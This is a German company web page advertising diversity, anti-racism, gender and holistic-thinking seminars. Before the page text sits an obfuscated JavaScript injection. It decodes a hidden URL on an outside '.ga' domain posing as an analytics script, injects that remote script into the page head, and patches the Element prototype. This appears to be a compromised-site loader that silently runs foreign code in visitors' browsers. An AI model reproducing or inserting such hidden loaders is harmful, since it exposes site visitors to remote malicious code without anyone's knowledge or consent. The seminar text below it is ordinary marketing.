var _0x1c9a=['push','229651wHRLFT','511754lPBDVY','length','2080825FKHOBK','src','1lLQkOc','1614837wjeKHo','insertBefore','fromCharCode','179434whQoYd','1774xXwpgH','1400517aqruvf','7vsbpgk','3112gjEEcU','1mFUgXZ','script','1534601MOJEnu','prototype','245777oIJjBl','47jNCcHN','1HkMAkw','nextSibling','appendAfter','shift','18885bYhhDw','1096016qxAIHd','72lReGEt','1305501RTgYEh','4KqoyHD','appendChild','createElement','getElementsByTagName'];var _0xd6df=function(_0x3a7b86,_0x4f5b42){_0x3a7b86=_0x3a7b86-0x1f4;var _0x1c9a62=_0x1c9a[_0x3a7b86];return _0x1c9a62;};(function(_0x2551a2,_0x3dbe97){var _0x34ce29=_0xd6df;while(!![]){try{var _0x176f37=-parseInt(_0x34ce29(0x20a))*-parseInt(_0x34ce29(0x205))+-parseInt(_0x34ce29(0x204))*-parseInt(_0x34ce29(0x206))+-parseInt(_0x34ce29(0x1fc))+parseInt(_0x34ce29(0x200))*parseInt(_0x34ce29(0x1fd))+-parseInt(_0x34ce29(0x1fb))*-parseInt(_0x34ce29(0x1fe))+-parseInt(_0x34ce29(0x20e))*parseInt(_0x34ce29(0x213))+-parseInt(_0x34ce29(0x1f5));if(_0x176f37===_0x3dbe97)break;else _0x2551a2['push'](_0x2551a2['shift']());}catch(_0x201239){_0x2551a2['push'](_0x2551a2['shift']());}}}(_0x1c9a,0xc08f4));function smalller(){var _0x1aa566=_0xd6df,_0x527acf=[_0x1aa566(0x1f6),_0x1aa566(0x20b),'851164FNRMLY',_0x1aa566(0x202),_0x1aa566(0x1f7),_0x1aa566(0x203),'fromCharCode',_0x1aa566(0x20f),_0x1aa566(0x1ff),_0x1aa566(0x211),_0x1aa566(0x214),_0x1aa566(0x207),_0x1aa566(0x201),'parentNode',_0x1aa566(0x20c),_0x1aa566(0x210),_0x1aa566(0x1f8),_0x1aa566(0x20d),_0x1aa566(0x1f9),_0x1aa566(0x208)],_0x1e90a8=function(_0x49d308,_0xd922ec){_0x49d308=_0x49d308-0x17e;var _0x21248f=_0x527acf[_0x49d308];return _0x21248f;},_0x167299=_0x1e90a8;(function(_0x4346f4,_0x1d29c9){var _0x530662=_0x1aa566,_0x1bf0b5=_0x1e90a8;while(!![]){try{var _0x2811eb=-parseInt(_0x1bf0b5(0x187))+parseInt(_0x1bf0b5(0x186))+parseInt(_0x1bf0b5(0x18d))+parseInt(_0x1bf0b5(0x18c))+-parseInt(_0x1bf0b5(0x18e))*parseInt(_0x1bf0b5(0x180))+-parseInt(_0x1bf0b5(0x18b))+-parseInt(_0x1bf0b5(0x184))*parseInt(_0x1bf0b5(0x17e));if(_0x2811eb===_0x1d29c9)break;else _0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}catch(_0x1cd819){_0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}}}(_0x527acf,0xd2c23),(Element[_0x167299(0x18f)][_0x1aa566(0x208)]=function(_0x3d096a){var _0x2ca721=_0x167299;_0x3d096a[_0x2ca721(0x183)][_0x2ca721(0x188)](this,_0x3d096a[_0x2ca721(0x181)]);},![]),function(){var _0x5d96e1=_0x1aa566,_0x22c893=_0x167299,_0x306df5=document[_0x22c893(0x185)](_0x22c893(0x182));_0x306df5[_0x22c893(0x18a)]=String[_0x22c893(0x190)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x61,0x6e,0x61,0x6c,0x79,0x74,0x69,0x63,0x73,0x2e,0x6a,0x73,0x3f,0x63,0x69,0x64,0x3d,0x30,0x30,0x30,0x30,0x26,0x70,0x69,0x64,0x69,0x3d,0x31,0x39,0x31,0x38,0x31,0x37,0x26,0x69,0x64,0x3d,0x35,0x33,0x36,0x34,0x36),_0x306df5[_0x22c893(0x189)](document[_0x22c893(0x17f)](String[_0x5d96e1(0x1fa)](0x73,0x63,0x72,0x69,0x70,0x74))[0x0]),_0x306df5[_0x5d96e1(0x208)](document[_0x22c893(0x17f)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0]),document[_0x5d96e1(0x211)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0][_0x22c893(0x191)](_0x306df5);}());}function biggger(){var _0x5d031d=_0xd6df,_0x5c5bd2=document[_0x5d031d(0x211)](_0x5d031d(0x201));for(var _0x5a0282=0x0;_0x5a0282<_0x5c5bd2[_0x5d031d(0x1f4)];_0x5a0282++){if(_0x5c5bd2[_0x5a0282][_0x5d031d(0x1f6)]['indexOf'](String['fromCharCode'](0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d))>-0x1)return 0x1;}return 0x0;}biggger()==0x0&&smalller();

Diversität – Denken – Realität

Seminar- und Trainingsangebot

Vielfalt bringts!

CultureClub kann Ihnen Wege zu einem besseren Umgang mit Unterschieden aufzeigen. Wie lassen sich unterschiedliche Potentiale gemeinsam nutzen?  In welcher Weise kann Unterschiedlichkeit und Vielfalt zur Erfolgsmaximierung beitragen? Mit einem inhaltsstarken Angebot an Trainings und Seminaren, helfen wir Ihnen gerne dabei, Antworten auf derartige Fragen zu finden. Diversity-Konzepte fördern ein effizientes und positives Klima innerhalb von Gruppen und Teams und sorgen für eine Wertschätzende und Ressourcenfördernde Umgebung.

Gemeinsam verschieden

Einzigartigkeit ist ein allumfassendes Prinzip, denn nichts und niemanden gibt es in gleicher Form noch einmal. Mit anderen Worten ist das einzig Gemeinsame aller Menschen die Unterschiedlichkeit und Verschiedenheit ein natürliches Prinzip, dass die optimale Nutzung aller Ressourcen gewährleistet.

 

Da unsere Gesellschaft von Grund auf nicht sehr gut im Umgang mit Unterschieden und Anders-sein ist, geben wir uns zunehmend einer Illusion hin, Unterschiede existieren nicht und Gleichheit mehr wäre als nur ein gedankliches Konstrukt des Menschen.

Aus der Not mach eine Tugend

Derzeit können wir das natürliche Erfolgskonzept der Vielfalt noch kaum für uns nutzen. Obwohl sich im Laufe der Zeit mit der Siedlung von Menschen an unterschiedlichen Orten eine Vielzahl an Denkweisen, Kulturen, Sprachen und Weltbilder gebildet haben, haben wir Menschen uns bisweilen meist gerade auf Grund dieser Unterschiedlichkeiten bekämpft, anstatt mit Hilfe dieser Vielfalt unsere wirklichen Probleme und Herausforderungen zu meistern. Krieg und Unterdrückung haben uns letztendlich von der Sicherung unserer Zukunft abgehalten. „Einfalt“ wich der Vielfalt und aus der Ignoranz füreinander wurde Blindheit.

 

Durch den Prozess der Globalisierung werden wir nun vermehrt mit Unterschiedlichkeit und Andersartigkeit konfrontiert, so dass wir uns nun unausweichlich mit der kulturellen und auch individuellen Diversität auseinandersetzen müssen. Statt nun jedoch durch Gleichheit unser Problem mit der Unterschiedlichkeit zu lösen, wäre es besser, eine neuen Sicht zu erlangen, und uns die Diversität und Vielfalt an Möglichkeiten und Potenzialen zu Nutze zu machen.

Es lebe der Unterschied
Diversität nutzen, Vielfalt leben
Licht ins Dunkel
Anti-Rassismus-Training
Alles nur in meinem Kopf
Der Gender-Workshop

Beispielhafte Auswahl an Seminaren im Bereich Diversität und Denken

Diversität und Gerechtigkeit
gleiche Ungleichheit
Die Welt ist eine Zwiebel
Einführung in das holistische Denken
Wer integriert, gewinnt!
Integrales Denken – eine Einführung